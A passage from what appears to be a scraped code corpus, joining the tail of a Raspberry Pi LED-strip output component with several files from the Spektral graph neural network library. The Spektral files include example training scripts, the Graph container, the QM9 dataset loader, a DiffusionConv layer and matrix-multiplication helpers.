self._output_queue = output_queue
self._output_queue_lock = output_queue_lock
self._notification_queue_in = notification_queue_in
self._notification_queue_out = notification_queue_out
self.ten_seconds_counter = time.time()
self.sec_ten_seconds_counter = time.time()
self.start_time = time.time()
# Initial config load.
self._config = ConfigService.instance(self._config_lock).config
#Init FPS Limiter
self.fps_limiter_start = time.time()
self.max_fps = self._config["audio_config"]["FPS"] + 10
self.min_waiting_time = 1 / self.max_fps
# Init all nessessarry components
self.manual_init()
self._skip_output = False
self._cancel_token = False
print("Output component started.")
while not self._cancel_token:
self.output_routine()
def output_routine(self):
# Limit the fps to decrease laggs caused by 100 percent cpu
self.fps_limiter()
# Check the nofitication queue
if not self._notification_queue_in.empty():
self._current_notification_in = self._notification_queue_in.get()
if hasattr(self, "_current_notification_in"):
if self._current_notification_in is NotificationEnum.config_refresh:
self.refresh()
elif self._current_notification_in is NotificationEnum.process_continue:
self._skip_output = False
elif self._current_notification_in is NotificationEnum.process_pause:
self._skip_output = True
elif self._current_notification_in is NotificationEnum.process_stop:
self.stop()
# Reset the current in notification, to do it only one time.
self._current_notification_in = None
# Skip the output sequence, for example to "pause" the process.
if self._skip_output:
if not self._output_queue.empty():
skip_output_queue = self._output_queue.get()
return
# Check if the queue is empty and stop if its empty.
if not self._output_queue.empty():
current_output_array = self._output_queue.get()
self.show(current_output_array)
#cProfile.runctx('self.show(current_output_array)', globals(), locals())
self.end_time = time.time()
if time.time() - self.ten_seconds_counter > 10:
self.ten_seconds_counter = time.time()
self.time_dif = self.end_time - self.start_time
self.fps = 1 / self.time_dif
print("Output Service | FPS: " + str(self.fps))
self.start_time = time.time()
def stop(self):
self._cancel_token = True
self.clear()
def refresh(self):
print("Refresh Output...")
# Refresh the config
ConfigService.instance(self._config_lock).load_config()
self._config = ConfigService.instance(self._config_lock).config
# Init the led components with the new config again
self.manual_init()
# Notifiy the master component, that I'm finished.
self._notification_queue_out.put(NotificationEnum.config_refresh_finished)
print("Output refreshed.")
def show(self, output_array):
import _rpi_ws281x as ws # pylint: disable=import-error
# Typecast the array to int
output_array = output_array.clip(0, 255).astype(int)
# sort the colors. grb
g = np.left_shift(output_array[1][:].astype(int), 16) # pylint: disable=assignment-from-no-return
r = np.left_shift(output_array[0][:].astype(int), 8) # pylint: disable=assignment-from-no-return
b = output_array[2][:].astype(int)
rgb = np.bitwise_or(np.bitwise_or(r, g), b).astype(int)
# You can only use ws2811_leds_set with the custom version.
#ws.ws2811_leds_set(self.channel, rgb)
for i in range(self._led_count):
ws.ws2811_led_set(self.channel, i, rgb[i].item())
resp = ws.ws2811_render(self._leds)
if resp != ws.WS2811_SUCCESS:
message = ws.ws2811_get_return_t_str(resp)
raise RuntimeError('ws2811_render failed with code {0} ({1})'.format(resp, message))
def clear(self):
# Create a Array with only 0
pixels = np.array([[0 for i in range(900)] for i in range(3)]).astype(int)
self.show(pixels)
def fps_limiter(self):
self.fps_limiter_end = time.time()
time_between_last_cycle = self.fps_limiter_end - self.fps_limiter_start
if time_between_last_cycle < self.min_waiting_time:
sleep(self.min_waiting_time - time_between_last_cycle)
self.fps_limiter_start = time.time()
def start_dummy(self, config_lock, notification_queue_in, notification_queue_out, output_queue, output_queue_lock):
print("Starting Output component..")
self._config_lock = config_lock
self._output_queue = output_queue
self._output_queue_lock = output_queue_lock
self._notification_queue_in = notification_queue_in
self._notification_queue_out = notification_queue_out
self._skip_output = False
self._cancel_token = False
print("Output component started.")
while not self._cancel_token:
sleep(0.2)
# Check the nofitication queue
if not self._notification_queue_in.empty():
self._current_notification_in = self._notification_queue_in.get()
if hasattr(self, "_current_notification_in"):
if self._current_notification_in is NotificationEnum.config_refresh:
self.refresh_dummy()
elif self._current_notification_in is NotificationEnum.process_continue:
self._skip_output = False
elif self._current_notification_in is NotificationEnum.process_pause:
self._skip_output = True
elif self._current_notification_in is NotificationEnum.process_stop:
print("dummy stop")
break
# Reset the current in notification, to do it only one time.
self._current_notification_in = None
# Skip the output sequence, for example to "pause" the process.
if self._skip_output:
self._output_queue_lock.acquire()
if not self._output_queue.empty():
self._output_queue.get()
self._output_queue_lock.release()
continue
# Check if the queue is empty and stop if its empty.
self._output_queue_lock.acquire()
if not self._output_queue.empty():
self._output_queue.get()
self._output_queue_lock.release()
def refresh_dummy(self):
print("Refresh Output...")
# Refresh the config
ConfigService.instance(self._config_lock).load_config()
self._config = ConfigService.instance(self._config_lock).config
# Notifiy the master component, that I'm finished.
self._notification_queue_out.put(NotificationEnum.config_refresh_finished)
print("Output refreshed.")
``` |
{
"source": "JonaBecher/spektral",
"score": 3
} |
#### File: examples/graph_prediction/qm9_ecc_batch.py
```python
import numpy as np
from tensorflow.keras.layers import Dense
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from spektral.data import BatchLoader
from spektral.datasets import QM9
from spektral.layers import ECCConv, GlobalSumPool, GraphMasking
################################################################################
# Config
################################################################################
learning_rate = 1e-3 # Learning rate
epochs = 10 # Number of training epochs
batch_size = 32 # Batch size
################################################################################
# Load data
################################################################################
dataset = QM9(amount=1000) # Set amount=None to train on whole dataset
# Parameters
F = dataset.n_node_features # Dimension of node features
S = dataset.n_edge_features # Dimension of edge features
n_out = dataset.n_labels # Dimension of the target
# Train/test split
idxs = np.random.permutation(len(dataset))
split = int(0.9 * len(dataset))
idx_tr, idx_te = np.split(idxs, [split])
dataset_tr, dataset_te = dataset[idx_tr], dataset[idx_te]
################################################################################
# Build model
################################################################################
class Net(Model):
def __init__(self):
super().__init__()
self.masking = GraphMasking()
self.conv1 = ECCConv(32, activation="relu")
self.conv2 = ECCConv(32, activation="relu")
self.global_pool = GlobalSumPool()
self.dense = Dense(n_out)
def call(self, inputs):
x, a, e = inputs
x = self.masking(x)
x = self.conv1([x, a, e])
x = self.conv2([x, a, e])
output = self.global_pool(x)
output = self.dense(output)
return output
model = Net()
optimizer = Adam(learning_rate)
model.compile(optimizer=optimizer, loss="mse")
################################################################################
# Fit model
################################################################################
loader_tr = BatchLoader(dataset_tr, batch_size=batch_size, mask=True)
model.fit(loader_tr.load(), steps_per_epoch=loader_tr.steps_per_epoch, epochs=epochs)
################################################################################
# Evaluate model
################################################################################
print("Testing model")
loader_te = BatchLoader(dataset_te, batch_size=batch_size, mask=True)
loss = model.evaluate(loader_te.load(), steps=loader_te.steps_per_epoch)
print("Done. Test loss: {}".format(loss))
```
#### File: examples/graph_prediction/tud_gin.py
```python
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import categorical_accuracy
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from spektral.data import DisjointLoader
from spektral.datasets import TUDataset
from spektral.layers import GINConv, GlobalAvgPool
################################################################################
# Config
################################################################################
learning_rate = 1e-3 # Learning rate
channels = 128 # Hidden units
layers = 3 # GIN layers
epochs = 10 # Number of training epochs
batch_size = 32 # Batch size
################################################################################
# Load data
################################################################################
dataset = TUDataset("PROTEINS", clean=True)
# Parameters
F = dataset.n_node_features # Dimension of node features
n_out = dataset.n_labels # Dimension of the target
# Train/test split
idxs = np.random.permutation(len(dataset))
split = int(0.9 * len(dataset))
idx_tr, idx_te = np.split(idxs, [split])
dataset_tr, dataset_te = dataset[idx_tr], dataset[idx_te]
loader_tr = DisjointLoader(dataset_tr, batch_size=batch_size, epochs=epochs)
loader_te = DisjointLoader(dataset_te, batch_size=batch_size, epochs=1)
################################################################################
# Build model
################################################################################
class GIN0(Model):
def __init__(self, channels, n_layers):
super().__init__()
self.conv1 = GINConv(channels, epsilon=0, mlp_hidden=[channels, channels])
self.convs = []
for _ in range(1, n_layers):
self.convs.append(
GINConv(channels, epsilon=0, mlp_hidden=[channels, channels])
)
self.pool = GlobalAvgPool()
self.dense1 = Dense(channels, activation="relu")
self.dropout = Dropout(0.5)
self.dense2 = Dense(n_out, activation="softmax")
def call(self, inputs):
x, a, i = inputs
x = self.conv1([x, a])
for conv in self.convs:
x = conv([x, a])
x = self.pool([x, i])
x = self.dense1(x)
x = self.dropout(x)
return self.dense2(x)
# Build model
model = GIN0(channels, layers)
optimizer = Adam(learning_rate)
loss_fn = CategoricalCrossentropy()
################################################################################
# Fit model
################################################################################
@tf.function(input_signature=loader_tr.tf_signature(), experimental_relax_shapes=True)
def train_step(inputs, target):
with tf.GradientTape() as tape:
predictions = model(inputs, training=True)
loss = loss_fn(target, predictions) + sum(model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
acc = tf.reduce_mean(categorical_accuracy(target, predictions))
return loss, acc
epoch = step = 0
results = []
for batch in loader_tr:
step += 1
loss, acc = train_step(*batch)
results.append((loss, acc))
if step == loader_tr.steps_per_epoch:
step = 0
epoch += 1
print("Ep. {} - Loss: {}. Acc: {}".format(epoch, *np.mean(results, 0)))
results = []
################################################################################
# Evaluate model
################################################################################
results = []
for batch in loader_te:
inputs, target = batch
predictions = model(inputs, training=False)
results.append(
(
loss_fn(target, predictions),
tf.reduce_mean(categorical_accuracy(target, predictions)),
)
)
print("Done. Test loss: {}. Test acc: {}".format(*np.mean(results, 0)))
```
#### File: examples/node_prediction/citation_cheby.py
```python
import numpy as np
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.layers import Dropout, Input
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.regularizers import l2
from spektral.data.loaders import SingleLoader
from spektral.datasets.citation import Citation
from spektral.layers import ChebConv
from spektral.transforms import LayerPreprocess
# Load data
dataset = Citation("cora", transforms=[LayerPreprocess(ChebConv)])
# We convert the binary masks to sample weights so that we can compute the
# average loss over the nodes (following original implementation by
# Kipf & Welling)
def mask_to_weights(mask):
return mask / np.count_nonzero(mask)
weights_tr, weights_va, weights_te = (
mask_to_weights(mask)
for mask in (dataset.mask_tr, dataset.mask_va, dataset.mask_te)
)
# Parameters
channels = 16 # Number of channels in the first layer
K = 2 # Max degree of the Chebyshev polynomials
dropout = 0.5 # Dropout rate for the features
l2_reg = 2.5e-4 # L2 regularization rate
learning_rate = 1e-2 # Learning rate
epochs = 200 # Number of training epochs
patience = 10 # Patience for early stopping
a_dtype = dataset[0].a.dtype # Only needed for TF 2.1
N = dataset.n_nodes # Number of nodes in the graph
F = dataset.n_node_features # Original size of node features
n_out = dataset.n_labels # Number of classes
# Model definition
x_in = Input(shape=(F,))
a_in = Input((N,), sparse=True, dtype=a_dtype)
do_1 = Dropout(dropout)(x_in)
gc_1 = ChebConv(
channels, K=K, activation="relu", kernel_regularizer=l2(l2_reg), use_bias=False
)([do_1, a_in])
do_2 = Dropout(dropout)(gc_1)
gc_2 = ChebConv(n_out, K=K, activation="softmax", use_bias=False)([do_2, a_in])
# Build model
model = Model(inputs=[x_in, a_in], outputs=gc_2)
optimizer = Adam(lr=learning_rate)
model.compile(
optimizer=optimizer,
loss=CategoricalCrossentropy(reduction="sum"), # To compute mean
weighted_metrics=["acc"],
)
model.summary()
# Train model
loader_tr = SingleLoader(dataset, sample_weights=weights_tr)
loader_va = SingleLoader(dataset, sample_weights=weights_va)
model.fit(
loader_tr.load(),
steps_per_epoch=loader_tr.steps_per_epoch,
validation_data=loader_va.load(),
validation_steps=loader_va.steps_per_epoch,
epochs=epochs,
callbacks=[EarlyStopping(patience=patience, restore_best_weights=True)],
)
# Evaluate model
print("Evaluating model.")
loader_te = SingleLoader(dataset, sample_weights=weights_te)
eval_results = model.evaluate(loader_te.load(), steps=loader_te.steps_per_epoch)
print("Done.\n" "Test loss: {}\n" "Test accuracy: {}".format(*eval_results))
```
#### File: examples/node_prediction/citation_gcn_custom.py
```python
import tensorflow as tf
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.optimizers import Adam
from spektral.datasets.citation import Cora
from spektral.layers import GCNConv
from spektral.models.gcn import GCN
from spektral.transforms import AdjToSpTensor, LayerPreprocess
from spektral.utils import tic, toc
tf.random.set_seed(seed=0) # make weight initialization reproducible
# Load data
dataset = Cora(normalize_x=True, transforms=[LayerPreprocess(GCNConv), AdjToSpTensor()])
graph = dataset[0]
x, a, y = graph.x, graph.a, graph.y
mask_tr, mask_va, mask_te = dataset.mask_tr, dataset.mask_va, dataset.mask_te
model = GCN(n_labels=dataset.n_labels, n_input_channels=dataset.n_node_features)
optimizer = Adam(lr=1e-2)
loss_fn = CategoricalCrossentropy()
# Training step
@tf.function
def train():
with tf.GradientTape() as tape:
predictions = model([x, a], training=True)
loss = loss_fn(y[mask_tr], predictions[mask_tr])
loss += sum(model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
return loss
# Time the execution of 200 epochs of training
train() # Warm up to ignore tracing times when timing
tic()
for epoch in range(1, 201):
loss = train()
toc("Spektral - GCN (200 epochs)")
print(f"Final loss = {loss}")
```
#### File: spektral/data/graph.py
```python
import warnings
import numpy as np
import scipy.sparse as sp
class Graph:
"""
A container to represent a graph. The data associated with the Graph is
stored in its attributes:
- `x`, for the node features;
- `a`, for the adjacency matrix;
- `e`, for the edge attributes;
- `y`, for the node or graph labels;
All of these default to `None` if you don't specify them in the constructor.
If you want to read all non-None attributes at once, you can call the
`numpy()` method, which will return all data in a tuple (with the order
defined above).
Graphs also have the following attributes that are computed automatically
from the data:
- `n_nodes`: number of nodes;
- `n_edges`: number of edges;
- `n_node_features`: size of the node features, if available;
- `n_edge_features`: size of the edge features, if available;
- `n_labels`: size of the labels, if available;
Any additional `kwargs` passed to the constructor will be automatically
assigned as instance attributes of the graph.
Data can be stored in Numpy arrays or Scipy sparse matrices, and labels can
also be scalars.
Spektral usually assumes that the different data matrices have specific
shapes, although this is not strictly enforced to allow more flexibility.
In general, node attributes should have shape `(n_nodes, n_node_features)` and the adjacency
matrix should have shape `(n_nodes, n_nodes)`.
Edge attributes can be stored in a dense format as arrays of shape
`(n_nodes, n_nodes, n_edge_features)` or in a sparse format as arrays of shape `(n_edges, n_edge_features)`
(so that you don't have to store all the zeros for missing edges). Most
components of Spektral will know how to deal with both situations
automatically.
Labels can refer to the entire graph (shape `(n_labels, )`) or to each
individual node (shape `(n_nodes, n_labels)`).
**Arguments**
- `x`: np.array, the node features (shape `(n_nodes, n_node_features)`);
- `a`: np.array or scipy.sparse matrix, the adjacency matrix (shape `(n_nodes, n_nodes)`);
- `e`: np.array, the edge features (shape `(n_nodes, n_nodes, n_edge_features)` or `(n_edges, n_edge_features)`);
- `y`: np.array, the node or graph labels (shape `(n_nodes, n_labels)` or `(n_labels, )`);
"""
def __init__(self, x=None, a=None, e=None, y=None, **kwargs):
if x is not None:
if not isinstance(x, np.ndarray):
raise ValueError(f"Unsupported type {type(x)} for x")
if len(x.shape) == 1:
x = x[:, None]
warnings.warn(f"x was automatically reshaped to {x.shape}")
if len(x.shape) != 2:
raise ValueError(
f"x must have shape (n_nodes, n_node_features), got "
f"rank {len(x.shape)}"
)
if a is not None:
if not (isinstance(a, np.ndarray) or sp.isspmatrix(a)):
raise ValueError(f"Unsupported type {type(a)} for a")
if len(a.shape) != 2:
raise ValueError(
f"a must have shape (n_nodes, n_nodes), got rank {len(a.shape)}"
)
if e is not None:
if not isinstance(e, np.ndarray):
raise ValueError(f"Unsupported type {type(e)} for e")
if len(e.shape) not in (2, 3):
raise ValueError(
f"e must have shape (n_edges, n_edge_features) or "
f"(n_nodes, n_nodes, n_edge_features), got rank {len(e.shape)}"
)
self.x = x
self.a = a
self.e = e
self.y = y
# Read extra kwargs
for k, v in kwargs.items():
self[k] = v
def numpy(self):
return tuple(ret for ret in [self.x, self.a, self.e, self.y] if ret is not None)
def get(self, *keys):
return tuple(self[key] for key in keys if self[key] is not None)
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key, None)
def __contains__(self, key):
return key in self.keys
def __repr__(self):
return "Graph(n_nodes={}, n_node_features={}, n_edge_features={}, n_labels={})".format(
self.n_nodes, self.n_node_features, self.n_edge_features, self.n_labels
)
@property
def n_nodes(self):
if self.x is not None:
return self.x.shape[-2]
elif self.a is not None:
return self.a.shape[-1]
else:
return None
@property
def n_edges(self):
if sp.issparse(self.a):
return self.a.nnz
elif isinstance(self.a, np.ndarray):
return np.count_nonzero(self.a)
else:
return None
@property
def n_node_features(self):
if self.x is not None:
return self.x.shape[-1]
else:
return None
@property
def n_edge_features(self):
if self.e is not None:
return self.e.shape[-1]
else:
return None
@property
def n_labels(self):
if self.y is not None:
shp = np.shape(self.y)
return 1 if len(shp) == 0 else shp[-1]
else:
return None
@property
def keys(self):
keys = [
key
for key in self.__dict__.keys()
if self[key] is not None and not key.startswith("__")
]
return keys
```
#### File: spektral/datasets/qm9.py
```python
import os
import os.path as osp
import numpy as np
from joblib import Parallel, delayed
from tensorflow.keras.utils import get_file
from tqdm import tqdm
from spektral.data import Dataset, Graph
from spektral.utils import label_to_one_hot, sparse
from spektral.utils.io import load_csv, load_sdf
ATOM_TYPES = [1, 6, 7, 8, 9]
BOND_TYPES = [1, 2, 3, 4]
class QM9(Dataset):
"""
The QM9 chemical data set of small molecules.
In this dataset, nodes represent atoms and edges represent chemical bonds.
There are 5 possible atom types (H, C, N, O, F) and 4 bond types (single,
double, triple, aromatic).
Node features represent the chemical properties of each atom and include:
- The atomic number, one-hot encoded;
- The atom's position in the X, Y, and Z dimensions;
- The atomic charge;
- The mass difference from the monoisotope;
The edge features represent the type of chemical bond between two atoms,
one-hot encoded.
Each graph has an 19-dimensional label for regression.
**Arguments**
- `amount`: int, load this many molecules instead of the full dataset
(useful for debugging).
- `n_jobs`: number of CPU cores to use for reading the data (-1, to use all
available cores).
"""
url = "https://deepchemdata.s3-us-west-1.amazonaws.com/datasets/gdb9.tar.gz"
def __init__(self, amount=None, n_jobs=1, **kwargs):
self.amount = amount
self.n_jobs = n_jobs
super().__init__(**kwargs)
def download(self):
get_file(
"qm9.tar.gz",
self.url,
extract=True,
cache_dir=self.path,
cache_subdir=self.path,
)
os.remove(osp.join(self.path, "qm9.tar.gz"))
def read(self):
print("Loading QM9 dataset.")
sdf_file = osp.join(self.path, "gdb9.sdf")
data = load_sdf(sdf_file, amount=self.amount) # Internal SDF format
def read_mol(mol):
x = np.array([atom_to_feature(atom) for atom in mol["atoms"]])
a, e = mol_to_adj(mol)
return x, a, e
data = Parallel(n_jobs=self.n_jobs)(
delayed(read_mol)(mol) for mol in tqdm(data, ncols=80)
)
x_list, a_list, e_list = list(zip(*data))
# Load labels
labels_file = osp.join(self.path, "gdb9.sdf.csv")
labels = load_csv(labels_file)
labels = labels.set_index("mol_id").values
if self.amount is not None:
labels = labels[: self.amount]
return [
Graph(x=x, a=a, e=e, y=y)
for x, a, e, y in zip(x_list, a_list, e_list, labels)
]
def atom_to_feature(atom):
atomic_num = label_to_one_hot(atom["atomic_num"], ATOM_TYPES)
coords = atom["coords"]
charge = atom["charge"]
iso = atom["iso"]
return np.concatenate((atomic_num, coords, [charge, iso]), -1)
def mol_to_adj(mol):
row, col, edge_features = [], [], []
for bond in mol["bonds"]:
start, end = bond["start_atom"], bond["end_atom"]
row += [start, end]
col += [end, start]
edge_features += [bond["type"]] * 2
a, e = sparse.edge_index_to_matrix(
edge_index=np.array((row, col)).T,
edge_weight=np.ones_like(row),
edge_features=label_to_one_hot(edge_features, BOND_TYPES),
)
return a, e
```
#### File: spektral/datasets/utils.py
```python
import os
import os.path as osp
import zipfile
import requests
from tqdm import tqdm
_dataset_folder = "~/.spektral/datasets"
_config_path = osp.expanduser("~/.spektral/config.json")
if osp.isfile(_config_path):
import json
with open(_config_path) as fh:
_config = json.load(fh)
_dataset_folder = _config.get("dataset_folder", _dataset_folder)
DATASET_FOLDER = osp.expanduser(_dataset_folder)
def download_file(url, datadir, fname, progress=True, extract=True):
with requests.get(url, stream=progress) as r:
r.raise_for_status()
os.makedirs(datadir, exist_ok=True)
outfile = osp.join(datadir, fname)
with open(outfile, "wb") as of:
if progress:
pbar = tqdm(
total=int(r.headers["Content-Length"]),
ncols=80,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
for chunk in r.iter_content(chunk_size=8192):
if chunk is not None:
of.write(chunk)
pbar.update(len(chunk))
else:
of.write(r.content)
if extract and fname.endswith(".zip"):
with zipfile.ZipFile(outfile, "r") as of:
of.extractall(datadir)
os.remove(outfile)
```
#### File: layers/convolutional/diffusion_conv.py
```python
import tensorflow as tf
import tensorflow.keras.layers as layers
from spektral.layers.convolutional.conv import Conv
from spektral.utils import gcn_filter
class DiffuseFeatures(layers.Layer):
r"""
Utility layer calculating a single channel of the diffusional convolution.
The procedure is based on [https://arxiv.org/abs/1707.01926](https://arxiv.org/abs/1707.01926)
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Normalized adjacency or attention coef. matrix \(\hat \A \) of shape
`([batch], n_nodes, n_nodes)`; Use DiffusionConvolution.preprocess to normalize.
**Output**
- Node features with the same shape as the input, but with the last
dimension changed to \(1\).
**Arguments**
- `num_diffusion_steps`: How many diffusion steps to consider. \(K\) in paper.
- `kernel_initializer`: initializer for the weights;
- `kernel_regularizer`: regularization applied to the kernel vectors;
- `kernel_constraint`: constraint applied to the kernel vectors;
"""
def __init__(
self,
num_diffusion_steps,
kernel_initializer,
kernel_regularizer,
kernel_constraint,
**kwargs
):
super().__init__(**kwargs)
self.K = num_diffusion_steps
self.kernel_initializer = kernel_initializer
self.kernel_regularizer = kernel_regularizer
self.kernel_constraint = kernel_constraint
def build(self, input_shape):
# Initializing the kernel vector (R^K) (theta in paper)
self.kernel = self.add_weight(
shape=(self.K,),
name="kernel",
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
)
def call(self, inputs):
x, a = inputs
# Calculate diffusion matrix: sum kernel_k * Attention_t^k
# tf.polyval needs a list of tensors as the coeff. thus we
# unstack kernel
diffusion_matrix = tf.math.polyval(tf.unstack(self.kernel), a)
# Apply it to X to get a matrix C = [C_1, ..., C_F] (n_nodes x n_node_features)
# of diffused features
diffused_features = tf.matmul(diffusion_matrix, x)
# Now we add all diffused features (columns of the above matrix)
# and apply a non linearity to obtain H:,q (eq. 3 in paper)
H = tf.math.reduce_sum(diffused_features, axis=-1)
# H has shape ([batch], n_nodes) but as it is the sum of columns
# we reshape it to ([batch], n_nodes, 1)
return tf.expand_dims(H, -1)
class DiffusionConv(Conv):
r"""
A diffusion convolution operator from the paper
> [Diffusion Convolutional Recurrent Neural Network: Data-Driven Traffic
Forecasting](https://arxiv.org/abs/1707.01926)<br>
> <NAME> et al.
**Mode**: single, disjoint, mixed, batch.
**This layer expects a dense adjacency matrix.**
Given a number of diffusion steps \(K\) and a row-normalized adjacency
matrix \(\hat \A \), this layer calculates the \(q\)-th channel as:
$$
\mathbf{X}_{~:,~q}' = \sigma\left( \sum_{f=1}^{F} \left( \sum_{k=0}^{K-1}
\theta_k {\hat \A}^k \right) \X_{~:,~f} \right)
$$
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Normalized adjacency or attention coef. matrix \(\hat \A \) of shape
`([batch], n_nodes, n_nodes)`; Use `DiffusionConvolution.preprocess` to normalize.
**Output**
- Node features with the same shape as the input, but with the last
dimension changed to `channels`.
**Arguments**
- `channels`: number of output channels;
- `K`: number of diffusion steps.
- `activation`: activation function \(\sigma\); (\(\tanh\) by default)
- `kernel_initializer`: initializer for the weights;
- `kernel_regularizer`: regularization applied to the weights;
- `kernel_constraint`: constraint applied to the weights;
"""
def __init__(
self,
channels,
K=6,
activation="tanh",
kernel_initializer="glorot_uniform",
kernel_regularizer=None,
kernel_constraint=None,
**kwargs
):
super().__init__(
activation=activation,
kernel_initializer=kernel_initializer,
kernel_regularizer=kernel_regularizer,
kernel_constraint=kernel_constraint,
**kwargs
)
self.channels = channels
self.K = K + 1
def build(self, input_shape):
self.filters = [
DiffuseFeatures(
num_diffusion_steps=self.K,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
)
for _ in range(self.channels)
]
def apply_filters(self, x, a):
# This will be a list of channels diffused features.
# Each diffused feature is a (batch, n_nodes, 1) tensor.
# Later we will concat all the features to get one
# (batch, n_nodes, channels) diffused graph signal
diffused_features = []
# Iterating over all channels diffusion filters
for diffusion in self.filters:
diffused_feature = diffusion((x, a))
diffused_features.append(diffused_feature)
return tf.concat(diffused_features, -1)
def call(self, inputs, mask=None):
x, a = inputs
output = self.apply_filters(x, a)
if mask is not None:
output *= mask[0]
output = self.activation(output)
return output
@property
def config(self):
return {"channels": self.channels, "K": self.K - 1}
@staticmethod
def preprocess(a):
return gcn_filter(a)
```
#### File: layers/ops/matmul.py
```python
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.python.ops.linalg.sparse import sparse as tfsp
from . import ops
def dot(a, b):
"""
Computes a @ b, for a, b of the same rank (both 2 or both 3).
If the rank is 2, then the innermost dimension of `a` must match the
outermost dimension of `b`.
If the rank is 3, the first dimension of `a` and `b` must be equal and the
function computes a batch matmul.
Supports both dense and sparse multiplication (including sparse-sparse).
:param a: Tensor or SparseTensor with rank 2 or 3.
:param b: Tensor or SparseTensor with same rank as b.
:return: Tensor or SparseTensor with rank 2 or 3.
"""
a_ndim = K.ndim(a)
b_ndim = K.ndim(b)
assert a_ndim == b_ndim, "Expected equal ranks, got {} and {}" "".format(
a_ndim, b_ndim
)
a_is_sparse = K.is_sparse(a)
b_is_sparse = K.is_sparse(b)
# Handle cases: rank 2 sparse-dense, rank 2 dense-sparse
# In these cases we can use the faster sparse-dense matmul of tf.sparse
if a_ndim == 2:
if a_is_sparse and not b_is_sparse:
return tf.sparse.sparse_dense_matmul(a, b)
if not a_is_sparse and b_is_sparse:
return ops.transpose(
tf.sparse.sparse_dense_matmul(ops.transpose(b), ops.transpose(a))
)
# Handle cases: rank 2 sparse-sparse, rank 3 sparse-dense,
# rank 3 dense-sparse, rank 3 sparse-sparse
# In these cases we can use the tfsp.CSRSparseMatrix implementation (slower,
# but saves memory)
if a_is_sparse:
a = tfsp.CSRSparseMatrix(a)
if b_is_sparse:
b = tfsp.CSRSparseMatrix(b)
if a_is_sparse or b_is_sparse:
out = tfsp.matmul(a, b)
if hasattr(out, "to_sparse_tensor"):
return out.to_sparse_tensor()
else:
return out
# Handle case: rank 2 dense-dense, rank 3 dense-dense
# Here we use the standard dense operation
return tf.matmul(a, b)
def mixed_mode_dot(a, b):
"""
Computes the equivalent of `tf.einsum('ij,bjk->bik', a, b)`, but
works for both dense and sparse inputs.
:param a: Tensor or SparseTensor with rank 2.
:param b: Tensor or SparseTensor with rank 3.
:return: Tensor or SparseTensor with rank 3.
"""
shp = K.int_shape(b)
b_t = ops.transpose(b, (1, 2, 0))
b_t = ops.reshape(b_t, (shp[1], -1))
output = dot(a, b_t)
output = ops.reshape(output, (shp[1], shp[2], -1))
output = ops.transpose(output, (2, 0, 1))
return output
def modal_dot(a, b, transpose_a=False, transpose_b=False):
"""
Computes the matrix multiplication of a and b, handling the data modes
automatically.
This is a wrapper to standard matmul operations, for a and b with rank 2
or 3, that:
- Supports automatic broadcasting of the "batch" dimension if the two inputs
have different ranks.
- Supports any combination of dense and sparse inputs.
This op is useful for multiplying matrices that represent batches of graphs
in the different modes, for which the adjacency matrices may or may not be
sparse and have different ranks from the node attributes.
Additionally, it can also support the case where we have many adjacency
matrices and only one graph signal (which is uncommon, but may still happen).
If you know a-priori the type and shape of the inputs, it may be faster to
use the built-in functions of TensorFlow directly instead.
Examples:
- `a` rank 2, `b` rank 2 -> `a @ b`
- `a` rank 3, `b` rank 3 -> `[a[i] @ b[i] for i in range(len(a))]`
- `a` rank 2, `b` rank 3 -> `[a @ b[i] for i in range(len(b))]`
- `a` rank 3, `b` rank 2 -> `[a[i] @ b for i in range(len(a))]`
:param a: Tensor or SparseTensor with rank 2 or 3;
:param b: Tensor or SparseTensor with rank 2 or 3;
:param transpose_a: transpose the innermost 2 dimensions of `a`;
:param transpose_b: transpose the innermost 2 dimensions of `b`;
:return: Tensor or SparseTensor with rank = max(rank(a), rank(b)).
"""
a_ndim = K.ndim(a)
b_ndim = K.ndim(b)
assert a_ndim in (2, 3), "Expected a of rank 2 or 3, got {}".format(a_ndim)
assert b_ndim in (2, 3), "Expected b of rank 2 or 3, got {}".format(b_ndim)
if transpose_a:
perm = None if a_ndim == 2 else (0, 2, 1)
a = ops.transpose(a, perm)
if transpose_b:
perm = None if b_ndim == 2 else (0, 2, 1)
b = ops.transpose(b, perm)
if a_ndim == b_ndim:
# ...ij,...jk->...ik
return dot(a, b)
elif a_ndim == 2:
# ij,bjk->bik
return mixed_mode_dot(a, b)
else: # a_ndim == 3
# bij,jk->bik
if not K.is_sparse(a) and not K.is_sparse(b):
# Immediately fallback to standard dense matmul, no need to reshape
return tf.matmul(a, b)
# If either input is sparse, we use dot(a, b)
# This implementation is faster than using rank 3 sparse matmul with tfsp
a_shape = tf.shape(a)
b_shape = tf.shape(b)
a_flat = ops.reshape(a, (-1, a_shape[2]))
output = dot(a_flat, b)
return ops.reshape(output, (-1, a_shape[1], b_shape[1]))
def matmul_at_b_a(a, b):
"""
Computes a.T @ b @ a, for a, b with rank 2 or 3.
Supports automatic broadcasting of the "batch" dimension if the two inputs
have different ranks.
Supports any combination of dense and sparse inputs.
:param a: Tensor or SparseTensor with rank 2 or 3.
:param b: Tensor or SparseTensor with rank 2 or 3.
:return: Tensor or SparseTensor with rank = max(rank(a), rank(b)).
"""
at_b = modal_dot(a, b, transpose_a=True)
at_b_a = modal_dot(at_b, a)
return at_b_a
def matrix_power(a, k):
"""
